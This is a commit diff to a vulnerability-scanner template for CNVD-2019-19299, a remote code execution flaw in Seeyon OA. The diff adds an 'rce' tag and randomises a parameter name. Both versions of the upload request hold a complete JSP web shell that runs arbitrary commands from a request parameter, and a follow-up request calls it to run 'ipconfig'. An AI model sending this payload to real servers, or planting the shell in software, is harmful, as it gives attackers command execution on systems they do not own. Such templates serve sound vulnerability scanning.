Update CNVD-2019-19299.yaml

2022-03-01 00:42:43 +05:30 · 2022-03-01 00:42:43 +05:30 · caa2794b03
parent 113b43970f
commit caa2794b03
1 changed files with 3 additions and 3 deletions
--- a/cnvd/2019/CNVD-2019-19299.yaml
+++ b/cnvd/2019/CNVD-2019-19299.yaml
@ -7,7 +7,7 @@ info:
  reference:
    - https://www.cxyzjd.com/article/guangying177/110177339
    - https://github.com/sectestt/CNVD-2019-19299
-  tags: zhiyuan,cnvd,cnvd2019
+  tags: zhiyuan,cnvd,cnvd2019,rce

 requests:
  - raw:
@ -31,10 +31,10 @@ requests:
        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
        needReadFile = yRWZdAS6
        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
-        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>" +excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
+        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

      - |
-        GET /seeyon/test123456.jsp?pwd=asasd3344&cmd=ipconfig HTTP/1.1
+        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
        Host: {{Hostname}}

    req-condition: true